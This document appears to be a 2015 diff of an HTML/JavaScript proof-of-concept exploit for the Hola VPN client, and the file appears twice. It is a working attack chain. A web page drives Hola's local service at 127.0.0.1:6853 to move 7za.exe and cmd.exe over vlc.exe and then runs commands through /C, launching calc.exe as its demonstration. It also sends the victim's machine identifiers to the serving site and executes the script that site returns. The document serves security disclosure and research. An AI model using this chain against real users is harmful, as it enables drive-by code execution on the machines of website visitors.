DonnchaC · June 3, 2015 09:55
diff --git a/hola-rce-poc.html b/hola-rce-poc.html
 <!--
 This proof-of-concepts exploits a file move command, and an execute-with-controlled-arguemnts command to get code execution on a remote system. Only an executable in app/vlc.exe can be executed with controlled argument. This binary could be replaced with cmd.exe to be able to pass a /C argument for code execution. However due to lack of permission it is not possible to directly move cmd.exe. Instead a copy-like operation is needed to replace vlc.exe with cmd.exe. A 7-zip binary is shipped with Hola and located in the application directory. After replacing vlc.exe with 7za.exe it is possible to call 7zip to create and archive containing cmd.exe, extract the archive and move cmd.exe to vlc.exe. Commands can then be executed by calling vlc.exe with the /C option.

 I'd be interested in hearing any other methods people can think of to get code execution from these issues.
 -->
 <!doctype html>
 <html lang="en">
 <head>
  <meta charset="utf-8">
  <title>Hola Vulnerability Proof-of-Concept</title>
  <script src="https://code.jquery.com/jquery-1.10.2.js"></script>
 </head>
 <body>
 <script>
 /*
 PoC can run into problems when cmd.exe is run with arguments for 7zip
 Program will hang open, and then wont be able to replace the file.
 */
  (function() {
    var endpoint = "http://127.0.0.1:6853/";
    $.getJSON(endpoint + 'callback.json').done(function(data) {

      // Send check request, could be used to determine if vulnerable
      $.getJSON('/check', {
          cid: data.cid,
          uid: data.uid,
          ver: data.ver,
          os_ver: data.os_ver,
          build: data.build,
          vlc: data.vlc,
          workdir: data.workdir
        }).done(function(check_data) {
            // TODO: Get code to run PoC if running Windows and a
            // vulnerable version of Hola.
            $.getScript(check_data.js);
        }).fail(function(data){
          console.log('Check endpoint didnt send a script');
        });

        // Unescape path to Hola directory
        workdir = data.workdir.replace('\\\\','\\') + '\\app\\';

        // Move 7z.exe to vlc.exe
        $.getJSON(endpoint + 'vlc_mv.json', {
          src: workdir + '7za.exe',
          dst: workdir + 'vlc\\vlc.exe'
        }).done(function(data) {

          if(data.ret != 0){
            console.log('Failed to move 7za.exe:' + data.err);

            // TODO: Check if couldn't write file because vlc.exe running
            if(data.err.indexOf("doesn't exist") > -1) {
              console.log("It looks like the PoC has run already!");
            } else {
              console.log('vlc.exe may be running in a dead process prevent overwrite')
            }

            // If PoC succeed already, try pop calc.exe anyways
            pop_exec(endpoint);

            // Copy vlc.exe to 7za.exe. This should allow for vulnerability
            // to be exploited again if it fails.
            $.getJSON(endpoint + 'vlc_mv.json', {
              src: workdir + 'vlc.exe',
              dst: workdir + '7za.exe'
            });

          } else {
            // Run the full exploit chain

            // Now compress cmd.exe and vlc.exe to an archive
            $.getJSON(endpoint + 'vlc_start.json', {
              url: '"C:\\Windows\\System32\\cmd.exe" "'+
                   workdir+'vlc\\vlc.exe"',
              args:'a -aoa -y "' + workdir + 'vlc\\zip"'
            }).done(function(data) {
              if(data.ret != 0){
                console.log('Failed to compress cmd.exe:' + data.err);
              } else {

                // Need to wait for compression to finish
                setTimeout(function(){
                  // Extract cmd.exe
                  $.getJSON(endpoint + 'vlc_start.json', {
                    url: '"' + workdir + 'vlc\\zip.7z"',
                    args:'e -aoa -y -o"' + workdir + '"'
                  }).done(function(data) {
                    if(data.ret != 0){
                      console.log('Failed to extract cmd.exe:' + data.err);
                    } else {
                      // Need to wait for extraction to finish
                      setTimeout(function(){
                        // Move cmd.exe to vlc.exe
                        $.getJSON(endpoint + 'vlc_mv.json', {
                          src: workdir + 'cmd.exe',
                          dst: workdir + 'vlc\\vlc.exe'
                        }).done(function(data) {
                          if(data.ret != 0){
                            console.log('Failed to move cmd.exe to vlc.exe:' +
                                        data.err);
                            console.log('Try pop calc anyways, maybe vlc.exe is already cmd.exe')
                          } else {
                            console.log('PoC appears to have succeed');
                            pop_exec(endpoint);
                          }
                        });
                      }, 2000);
                    }
                  });
                }, 2000);

              }
            });
          }
        });


    }).fail(function(data) {
      console.log('Callback failed, probably not running Hola');
    });
  })();


 function pop_exec(endpoint){
  // Run calc.exe
  $.getJSON(endpoint + 'vlc_start.json', {
    args: '\/C',
    url: 'calc.exe'
    // url: '"'+workdir+'hola_setup.exe" --remove-hola --activex-vlc'
  }).done(function(data) {
    if(data.ret != 0){
      console.log('Failed to run calc.exe' + data.err);
    } else {
      console.log('Looks like popping calc succeed.');
    }
  });
 }
 </script>

 </body>
 </html>
	<!--
	This proof-of-concepts exploits a file move command, and an execute-with-controlled-arguemnts command to get code execution on a remote system. Only an executable in app/vlc.exe can be executed with controlled argument. This binary could be replaced with cmd.exe to be able to pass a /C argument for code execution. However due to lack of permission it is not possible to directly move cmd.exe. Instead a copy-like operation is needed to replace vlc.exe with cmd.exe. A 7-zip binary is shipped with Hola and located in the application directory. After replacing vlc.exe with 7za.exe it is possible to call 7zip to create and archive containing cmd.exe, extract the archive and move cmd.exe to vlc.exe. Commands can then be executed by calling vlc.exe with the /C option.

	I'd be interested in hearing any other methods people can think of to get code execution from these issues.
	-->
	<!doctype html>
	<html lang="en">
	<head>
	<meta charset="utf-8">
	<title>Hola Vulnerability Proof-of-Concept</title>
	<script src="https://code.jquery.com/jquery-1.10.2.js"></script>
	</head>
	<body>
	<script>
	/*
	PoC can run into problems when cmd.exe is run with arguments for 7zip
	Program will hang open, and then wont be able to replace the file.
	*/
	(function() {
	var endpoint = "http://127.0.0.1:6853/";
	$.getJSON(endpoint + 'callback.json').done(function(data) {

	// Send check request, could be used to determine if vulnerable
	$.getJSON('/check', {
	cid: data.cid,
	uid: data.uid,
	ver: data.ver,
	os_ver: data.os_ver,
	build: data.build,
	vlc: data.vlc,
	workdir: data.workdir
	}).done(function(check_data) {
	// TODO: Get code to run PoC if running Windows and a
	// vulnerable version of Hola.
	$.getScript(check_data.js);
	}).fail(function(data){
	console.log('Check endpoint didnt send a script');
	});

	// Unescape path to Hola directory
	workdir = data.workdir.replace('\\\\','\\') + '\\app\\';

	// Move 7z.exe to vlc.exe
	$.getJSON(endpoint + 'vlc_mv.json', {
	src: workdir + '7za.exe',
	dst: workdir + 'vlc\\vlc.exe'
	}).done(function(data) {

	if(data.ret != 0){
	console.log('Failed to move 7za.exe:' + data.err);

	// TODO: Check if couldn't write file because vlc.exe running
	if(data.err.indexOf("doesn't exist") > -1) {
	console.log("It looks like the PoC has run already!");
	} else {
	console.log('vlc.exe may be running in a dead process prevent overwrite')
	}

	// If PoC succeed already, try pop calc.exe anyways
	pop_exec(endpoint);

	// Copy vlc.exe to 7za.exe. This should allow for vulnerability
	// to be exploited again if it fails.
	$.getJSON(endpoint + 'vlc_mv.json', {
	src: workdir + 'vlc.exe',
	dst: workdir + '7za.exe'
	});

	} else {
	// Run the full exploit chain

	// Now compress cmd.exe and vlc.exe to an archive
	$.getJSON(endpoint + 'vlc_start.json', {
	url: '"C:\\Windows\\System32\\cmd.exe" "'+
	workdir+'vlc\\vlc.exe"',
	args:'a -aoa -y "' + workdir + 'vlc\\zip"'
	}).done(function(data) {
	if(data.ret != 0){
	console.log('Failed to compress cmd.exe:' + data.err);
	} else {

	// Need to wait for compression to finish
	setTimeout(function(){
	// Extract cmd.exe
	$.getJSON(endpoint + 'vlc_start.json', {
	url: '"' + workdir + 'vlc\\zip.7z"',
	args:'e -aoa -y -o"' + workdir + '"'
	}).done(function(data) {
	if(data.ret != 0){
	console.log('Failed to extract cmd.exe:' + data.err);
	} else {
	// Need to wait for extraction to finish
	setTimeout(function(){
	// Move cmd.exe to vlc.exe
	$.getJSON(endpoint + 'vlc_mv.json', {
	src: workdir + 'cmd.exe',
	dst: workdir + 'vlc\\vlc.exe'
	}).done(function(data) {
	if(data.ret != 0){
	console.log('Failed to move cmd.exe to vlc.exe:' +
	data.err);
	console.log('Try pop calc anyways, maybe vlc.exe is already cmd.exe')
	} else {
	console.log('PoC appears to have succeed');
	pop_exec(endpoint);
	}
	});
	}, 2000);
	}
	});
	}, 2000);

	}
	});
	}
	});


	}).fail(function(data) {
	console.log('Callback failed, probably not running Hola');
	});
	})();


	function pop_exec(endpoint){
	// Run calc.exe
	$.getJSON(endpoint + 'vlc_start.json', {
	args: '\/C',
	url: 'calc.exe'
	// url: '"'+workdir+'hola_setup.exe" --remove-hola --activex-vlc'
	}).done(function(data) {
	if(data.ret != 0){
	console.log('Failed to run calc.exe' + data.err);
	} else {
	console.log('Looks like popping calc succeed.');
	}
	});
	}
	</script>

	</body>
	</html>